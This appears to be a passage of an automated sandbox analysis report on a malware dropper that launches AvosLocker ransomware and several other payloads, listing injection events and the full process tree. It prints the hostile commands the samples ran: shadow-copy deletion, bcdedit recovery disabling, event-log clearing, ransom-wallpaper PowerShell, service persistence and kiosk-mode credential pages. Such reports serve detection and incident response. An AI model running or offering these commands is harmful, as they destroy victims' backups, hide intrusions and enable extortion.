PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 | N/A | C:\Users\Admin\AppData\Local\Temp\a\l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 | N/A | C:\Users\Admin\AppData\Local\Temp\a\l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 | N/A | C:\Users\Admin\AppData\Local\Temp\a\l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 | N/A | C:\Users\Admin\AppData\Local\Temp\a\l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 | N/A | C:\Users\Admin\AppData\Local\Temp\a\l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 | N/A | C:\Users\Admin\AppData\Local\Temp\a\l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 | N/A | C:\Users\Admin\AppData\Local\Temp\a\l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 | N/A | C:\Users\Admin\AppData\Local\Temp\a\l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4068 wrote to memory of 3428 | N/A | C:\Users\Admin\AppData\Local\Temp\a\l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2652 wrote to memory of 3808 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe
PID 2652 wrote to memory of 3808 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe
PID 2652 wrote to memory of 3808 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe
PID 3808 wrote to memory of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 4508 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 4508 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 4796 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 4796 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 664 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 3808 wrote to memory of 664 | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | C:\Windows\SYSTEM32\cmd.exe
PID 664 wrote to memory of 840 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 664 wrote to memory of 840 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5104 wrote to memory of 38024 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 5104 wrote to memory of 38024 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 4508 wrote to memory of 38044 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 4508 wrote to memory of 38044 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 4796 wrote to memory of 38036 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 4796 wrote to memory of 38036 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 2532 wrote to memory of 38052 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\bcdedit.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe

"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"

C:\Users\Admin\AppData\Local\Temp\a\pclient.exe

"C:\Users\Admin\AppData\Local\Temp\a\pclient.exe"

C:\Users\Admin\AppData\Local\Temp\a\s.exe

"C:\Users\Admin\AppData\Local\Temp\a\s.exe"

C:\Users\Admin\AppData\Local\Temp\a\v.exe

"C:\Users\Admin\AppData\Local\Temp\a\v.exe"

C:\Users\Admin\AppData\Local\Temp\a\l.exe

"C:\Users\Admin\AppData\Local\Temp\a\l.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Users\Admin\AppData\Local\Temp\a\fugu.exe

"C:\Users\Admin\AppData\Local\Temp\a\fugu.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\a\66dd9bfe41964_w9.exe

"C:\Users\Admin\AppData\Local\Temp\a\66dd9bfe41964_w9.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Users\Admin\AppData\Local\Temp\a\66dcab0bcba58_crypted.exe

"C:\Users\Admin\AppData\Local\Temp\a\66dcab0bcba58_crypted.exe"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\434945227.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

C:\Users\Admin\AppData\Local\Temp\a\66dd2c2d3b88f_opera.exe

"C:\Users\Admin\AppData\Local\Temp\a\66dd2c2d3b88f_opera.exe"

C:\Users\Admin\AppData\Local\Temp\a\66dcad8f5f33a_crypted.exe

"C:\Users\Admin\AppData\Local\Temp\a\66dcad8f5f33a_crypted.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\JEGDGIIJJE.exe"

C:\ProgramData\JEGDGIIJJE.exe

"C:\ProgramData\JEGDGIIJJE.exe"

C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe

"C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9f612cc40,0x7ff9f612cc4c,0x7ff9f612cc58

C:\Users\Admin\AppData\Roaming\1000026000\c2f184ac9f.exe

"C:\Users\Admin\AppData\Roaming\1000026000\c2f184ac9f.exe"

C:\ProgramData\IEHJJECBKK.exe

"C:\ProgramData\IEHJJECBKK.exe"

C:\Users\Admin\AppData\Local\Temp\1000030001\57725f46c1.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\57725f46c1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\a\Installer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\ProgramData\AAEBAKKJKK.exe

"C:\ProgramData\AAEBAKKJKK.exe"

C:\Users\Admin\AppData\Local\Temp\1000033001\3ebb97c342.exe

"C:\Users\Admin\AppData\Local\Temp\1000033001\3ebb97c342.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "RRTELIGS"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGHCGIIDGDAK" & exit

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "RRTELIGS" binpath= "C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe" start= "auto"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\66d9f685932be_uninstaller.exe

"C:\Users\Admin\AppData\Local\Temp\a\66d9f685932be_uninstaller.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "RRTELIGS"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe

C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe

C:\Users\Admin\AppData\Local\Temp\a\66d9f6e9330e4_deep.exe

"C:\Users\Admin\AppData\Local\Temp\a\66d9f6e9330e4_deep.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\66d9ddcb9dbfe_Build.exe

"C:\Users\Admin\AppData\Local\Temp\a\66d9ddcb9dbfe_Build.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe

"C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe

"C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe"

C:\Users\Admin\AppData\Local\Temp\a\Accounts.exe

"C:\Users\Admin\AppData\Local\Temp\a\Accounts.exe"

C:\Users\Admin\AppData\Local\Temp\a\Meeting.sfx.exe

"C:\Users\Admin\AppData\Local\Temp\a\Meeting.sfx.exe"

C:\Users\Admin\AppData\Local\Temp\a\Meeting.exe

"C:\Users\Admin\AppData\Local\Temp\a\Meeting.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

